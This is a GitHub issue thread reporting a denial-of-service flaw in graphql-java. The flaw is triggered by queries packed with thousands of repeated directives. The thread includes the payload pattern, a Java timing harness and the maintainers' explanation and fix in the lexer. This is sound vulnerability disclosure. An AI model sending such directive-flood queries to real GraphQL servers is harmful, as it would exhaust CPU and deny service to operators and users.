
Denial of Service via Directive overloading #2888

Closed
act1on3 opened this issue Jul 18, 2022 · 6 comments

act1on3 (Contributor) commented Jul 18, 2022

Hello team,
I've discovered that graphql-java is, by default, vulnerable to denial of service via directive overloading, and as far as I know there is no way to configure it securely.
Query example:

query {__typename @aa}

The security mechanisms I have in place do return errors, but they don't help in this case:

MaxQueryDepthInstrumentation and MaxQueryComplexityInstrumentation don't solve the issue either.
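
For reference, a minimal sketch (the class name and limit values are illustrative, not from the issue) of how those two instrumentations are typically wired in. The attack query is only one level deep and selects a single field, so neither guard fires:

import graphql.GraphQL;
import graphql.analysis.MaxQueryComplexityInstrumentation;
import graphql.analysis.MaxQueryDepthInstrumentation;
import graphql.execution.instrumentation.ChainedInstrumentation;
import graphql.schema.GraphQLSchema;

import java.util.List;

public class InstrumentedSetup {

    // Builds a GraphQL instance guarded by depth and complexity limits.
    static GraphQL withLimits(GraphQLSchema schema) {
        return GraphQL.newGraphQL(schema)
                .instrumentation(new ChainedInstrumentation(List.of(
                        new MaxQueryDepthInstrumentation(10),          // reject queries nested deeper than 10
                        new MaxQueryComplexityInstrumentation(100))))  // reject queries scoring over 100
                .build();
    }
}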

Query execution time increases by adding more directives:

5000 directives: 445 ms
10000 directives: 732 ms
15000 directives: 1164 ms
20000 directives: 1671 ms
25000 directives: 2159 ms
30000 directives: 2661 ms
35000 directives: 3171 ms
40000 directives: 3687 ms
45000 directives: 4224 ms
50000 directives: 4711 ms
55000 directives: 5227 ms
60000 directives: 5749 ms
65000 directives: 6297 ms
70000 directives: 6788 ms

The code snippet for testing:

import graphql.ExecutionInput;
import graphql.ExecutionResult;
import graphql.GraphQL;
import graphql.schema.GraphQLSchema;
import graphql.schema.StaticDataFetcher;
import graphql.schema.idl.RuntimeWiring;
import graphql.schema.idl.SchemaGenerator;
import graphql.schema.idl.SchemaParser;
import graphql.schema.idl.TypeDefinitionRegistry;

import static graphql.schema.idl.RuntimeWiring.newRuntimeWiring;

public class HelloWorld {

    static Integer STEP = 5000;
    static Integer CHECKS_AMOUNT = 15;

    public static void main(String[] args) {
        String schema = "type Query{hello: String}";

        SchemaParser schemaParser = new SchemaParser();
        TypeDefinitionRegistry typeDefinitionRegistry = schemaParser.parse(schema);

        RuntimeWiring runtimeWiring = newRuntimeWiring()
                .type("Query", builder -> builder.dataFetcher("hello", new StaticDataFetcher("world")))
                .build();

        SchemaGenerator schemaGenerator = new SchemaGenerator();
        GraphQLSchema graphQLSchema = schemaGenerator.makeExecutableSchema(typeDefinitionRegistry, runtimeWiring);

        GraphQL build = GraphQL.newGraphQL(graphQLSchema).build();

        String payload = "@aa";

        for (int i = 1; i < CHECKS_AMOUNT; i++) {

            String query = "query {__typename " + payload.repeat(i * STEP) + "}";
            ExecutionInput executionInput = ExecutionInput.newExecutionInput().query(query).build();

            long startTime = System.nanoTime();

            ExecutionResult executionResult = build.execute(executionInput);

            long endTime = System.nanoTime();
            long duration = (endTime - startTime);

            System.out.println(String.format("%d directives: %d ms", i * STEP, duration / 1000000));
        }
    }
}
bbakerman (Member) commented:

#2549 should help out of the box, as it's expressly meant for that attack.

The default number of tokens is 15,000, so your test above should have been kicked out at 15,000 tokens.

Hmm, perhaps this is because you are appending them together as @aa@aa@aa, which is valid, but perhaps the ANTLR token count does not register them as tokens and hence it never reaches the limit.

We will look into this more.

Thanks for reporting
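
For context, a hedged sketch of how the #2549 token limit can be configured, assuming the graphql.parser.ParserOptions API; the 15,000 value is the default mentioned above, set explicitly here for illustration:

import graphql.parser.ParserOptions;

public class ParserLimits {
    public static void main(String[] args) {
        // Cap how many tokens the parser will consume before aborting the parse.
        ParserOptions options = ParserOptions.newParserOptions()
                .maxTokens(15_000)
                .build();
        // Install as the JVM-wide default used when graphql-java parses queries.
        ParserOptions.setDefaultParserOptions(options);
    }
}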

bbakerman (Member) commented:

Thanks very much for reporting this problem. We did discover another problem in the ANTLR lexer that nullified our previous attempts to limit how many tokens get parsed.

The ANTLR lexer is by design greedy and wants to consume as many characters as it can before presenting them back to the parser. Certain grammar shapes (like @lol@lol directives all run together) mean that the lexer greedily races ahead and never returns to the parser (even though it has discovered N grammar elements).

The end result is that even though the parser had code to limit how many tokens it would process, the underlying lexer was driving CPU work that ended up in DoS territory before a callback to the parser could cause the limits to be applied.

See #2892
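
The idea behind such a fix, sketched below, is to enforce the limit at the lexer level instead of waiting for a parser callback. This is a hypothetical illustration (the class name and exception are invented; #2892 contains the actual implementation): a delegating ANTLR TokenSource that counts tokens as the lexer emits them and aborts once a budget is exceeded.

import org.antlr.v4.runtime.CharStream;
import org.antlr.v4.runtime.Token;
import org.antlr.v4.runtime.TokenFactory;
import org.antlr.v4.runtime.TokenSource;

// Hypothetical guard: wraps the real lexer and throws once too many tokens
// have been produced, stopping greedy lexing before it burns unbounded CPU.
public class MaxTokenGuardTokenSource implements TokenSource {
    private final TokenSource delegate;
    private final int maxTokens;
    private int count;

    public MaxTokenGuardTokenSource(TokenSource delegate, int maxTokens) {
        this.delegate = delegate;
        this.maxTokens = maxTokens;
    }

    @Override
    public Token nextToken() {
        if (++count > maxTokens) {
            throw new IllegalStateException(
                    "More than " + maxTokens + " tokens presented - aborting parse");
        }
        return delegate.nextToken();
    }

    @Override public int getLine() { return delegate.getLine(); }
    @Override public int getCharPositionInLine() { return delegate.getCharPositionInLine(); }
    @Override public CharStream getInputStream() { return delegate.getInputStream(); }
    @Override public String getSourceName() { return delegate.getSourceName(); }
    @Override public void setTokenFactory(TokenFactory<?> factory) { delegate.setTokenFactory(factory); }
    @Override public TokenFactory<?> getTokenFactory() { return delegate.getTokenFactory(); }
}

Building the parser's CommonTokenStream over such a source makes the parse fail fast no matter how far ahead the lexer runs.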

bbakerman (Member) commented:

I have asked in antlr/antlr4#3796 for more ANTLR info here so we can do better at this.

act1on3 (Contributor, Author) commented Jul 26, 2022

Hi @bbakerman,
Good to hear that the report was helpful, and thanks for investigating it carefully.

dondonz added this to the 19.0 milestone on Jul 26, 2022
dondonz (Member) commented Jul 26, 2022

Closed by #2892

dondonz closed this as completed on Jul 26, 2022
seanf commented Sep 14, 2022

Also closed by #2902 and #2897 (backports). Thanks @bbakerman!
